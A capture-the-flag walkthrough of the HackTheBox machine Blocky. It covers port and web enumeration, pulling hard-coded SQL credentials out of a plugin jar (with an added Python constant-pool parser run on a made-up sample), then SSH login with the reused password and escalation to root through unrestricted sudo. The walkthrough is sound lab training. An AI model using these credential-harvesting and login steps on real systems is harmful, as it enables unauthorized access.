HackTheBox Blocky Walkthrough
Initial Enumeration
I started with a full TCP port scan using nmap (all 65535 ports, default scripts and version detection) to find open ports and the services behind them. Note that -T5 is the most aggressive timing template and can drop probes on a slow VPN link, so a second pass at -T4 is worth it if the results look thin.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ nmap -sC -sV -p- -T5 -oN nmap/all-ports 10.10.10.37
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:04 IST
Nmap scan report for blocky.htb (10.10.10.37)
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 4.8
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.72 seconds
Nmap lists five ports, four of them open (8192 is reported closed, so nothing is listening there):
Port 21 - FTP ProFTPD 1.3.5a
Port 22 - SSH OpenSSH 7.2p2 (Ubuntu)
Port 80 - Apache httpd 2.4.18 serving WordPress 4.8
Port 8192 - closed (nmap's service table labels it sophos, but no service is running)
Port 25565 - Minecraft server 1.11.2
Let's start the enumeration with port 80 first.
Web Enumeration and User Shell
When we visit the URL http://10.10.10.37 in our web browser, it redirects to http://blocky.htb, so let's add the blocky.htb hostname to our /etc/hosts file.
┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.37 blocky.htb
Now when we visit http://blocky.htb in our web browser, it shows us a WordPress website. One of the posts is authored by a user named notch, which gives us a first username.
Next I performed a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blocky.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/12 11:05:08 Starting gobuster in directory enumeration mode
===============================================================
/wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/wp-includes (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/javascript (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/server-status (Status: 403) [Size: 298]
===============================================================
2022/07/12 12:02:45 Finished
===============================================================
Let's check these directories one by one.
http://blocky.htb/wiki - This has nothing useful.
http://blocky.htb/phpmyadmin - This is a normal phpMyAdmin installation, but we do not have credentials to log in.
http://blocky.htb/plugins - This is a directory listing containing two .jar files. I downloaded both of them.
To enumerate these further, I decompiled them with the jd-gui tool. The griefprevention-1.11.2-3.1.1.298.jar is the public GriefPrevention server plugin, so it is unlikely to contain anything specific to this box. The BlockyCore.jar, however, has an SQL username and password hard-coded as string constants in its main class; hard-coded credentials in a compiled artifact are a classic finding, because a jar is just a zip file and string constants survive compilation untouched.
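A full decompiler is not even needed for this step. Every string literal in a Java class sits in the class file's constant pool as a CONSTANT_String entry pointing at a CONSTANT_Utf8 entry, so walking the pool of each .class inside the jar recovers the literals directly. The Python below is an added example, not code from the original walkthrough or from the BlockyCore plugin: it parses the constant pool, flags classes whose identifiers look credential-related (sqlPass and the like) and lists their string literals. The jar it reads is constructed in memory with made-up values (the example/BlockyCore.class path and the host, user and password strings are all invented); only the class-file format is real.

```python
"""Recover hard-coded strings from a jar by parsing class constant pools.

Added example, not code from the original walkthrough. The sample jar is
built in memory with made-up values; the real BlockyCore.jar is not included.
"""
import io
import re
import struct
import zipfile

# Constant-pool tag -> payload size in bytes (tag 1, Utf8, is variable-length).
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def constant_pool(data: bytes):
    """Return (utf8, string_refs): utf8 maps pool index -> text, string_refs
    lists the Utf8 indexes used by CONSTANT_String entries (real literals)."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])  # number of pool slots + 1
    utf8, string_refs, pos, idx = {}, [], 10, 1
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                       # CONSTANT_Utf8: u2 length + bytes
            (n,) = struct.unpack(">H", data[pos:pos + 2])
            utf8[idx] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        elif tag in _FIXED:
            if tag == 8:                   # CONSTANT_String -> Utf8 index
                string_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += _FIXED[tag]
            if tag in (5, 6):              # Long/Double occupy two slots
                idx += 1
        else:
            raise ValueError(f"unknown constant-pool tag {tag} at {pos - 1}")
        idx += 1
    return utf8, string_refs


_SECRET_NAME = re.compile(r"pass|pwd|secret|token|apikey|credential", re.I)


def find_credentials(jar_bytes: bytes):
    """Classes with a credential-looking identifier -> those identifiers
    plus every string literal in the class."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if not name.endswith(".class"):
                continue
            utf8, refs = constant_pool(jar.read(name))
            literal_idx = set(refs)
            # Identifiers = Utf8 entries never used as a literal (field and
            # method names, descriptors, class names).
            idents = [s for i, s in utf8.items()
                      if i not in literal_idx and _SECRET_NAME.search(s)]
            if idents:
                hits[name] = {"identifiers": idents,
                              "literals": [utf8[i] for i in refs if i in utf8]}
    return hits


def build_sample_class() -> bytes:
    """Constructed stand-in for BlockyCore.class: magic, version and a
    constant pool only (the parser never reads past the pool)."""
    pool, slots = [], 0

    def add(entry: bytes, width: int = 1) -> int:
        nonlocal slots
        pool.append(entry)
        slots += width
        return slots - width + 1           # 1-based index of this entry

    def utf8(s: str) -> int:
        b = s.encode()
        return add(b"\x01" + struct.pack(">H", len(b)) + b)

    cls = utf8("example/BlockyCore")
    utf8("sqlHost"), utf8("sqlUser")
    pw = utf8("sqlPass")
    desc = utf8("Ljava/lang/String;")
    add(b"\x05" + b"\x00" * 8, width=2)             # CONSTANT_Long, two slots
    add(b"\x07" + struct.pack(">H", cls))           # CONSTANT_Class
    add(b"\x0c" + struct.pack(">HH", pw, desc))     # NameAndType sqlPass:String
    for literal in ("localhost", "root", "Ex4mpl3-0nly-Passw0rd"):  # made up
        add(b"\x08" + struct.pack(">H", utf8(literal)))  # CONSTANT_String
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, slots + 1) + b"".join(pool)


def build_sample_jar() -> bytes:
    """Constructed jar holding the sample class (path is made up)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("example/BlockyCore.class", build_sample_class())
    return buf.getvalue()


if __name__ == "__main__":
    for cls, info in find_credentials(build_sample_jar()).items():
        print(cls, info["identifiers"], info["literals"])
```

To run it against a real jar, replace build_sample_jar() with the file's bytes (open("BlockyCore.jar", "rb").read()). Distinguishing identifiers from literals matters: a field called sqlPass is the signal, and the CONSTANT_String entries next to it are the values a decompiler would show assigned to it.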
Next I performed a wpscan to look for WordPress users and vulnerable plugins.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ wpscan --url http://blocky.htb -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Jul 12 15:30:11 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://blocky.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://blocky.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <====================================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 12 15:30:23 2022
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 14.556 KB
[+] Data Received: 458.008 KB
[+] Memory used: 227.941 MB
[+] Elapsed time: 00:00:11
WPScan finds a single WordPress account: notch (the capitalised Notch is the same user's display name). I tried logging in to /wp-admin with this username and the password from BlockyCore.jar, but it does not work there. The same password does, however, work for the system user notch over SSH: a straightforward case of password reuse between a database credential and a login account.
┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@blocky.htb
The authenticity of host 'blocky.htb (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'blocky.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Tue Jul 12 02:28:22 2022 from 10.10.14.5
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
We got a shell! Now we can read our user flag present in the home directory of user notch.
notch@Blocky:~$ cat user.txt
b1ec3aef************************
Root Shell
Getting a root shell was a piece of cake! I used the sudo -l command to check whether the user notch can run any command as root.
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
Bingo! The entry (ALL : ALL) ALL means notch may run any command as any user via sudo, so a single sudo su - gives us a root shell (sudo still prompts for notch's own password, which we already have).
notch@Blocky:~$ sudo su -
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
Hurray! We are root. Now we can read the final flag in root's home directory, /root.
root@Blocky:~# cat root.txt
79e5ef26************************
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Bradley Armstrong.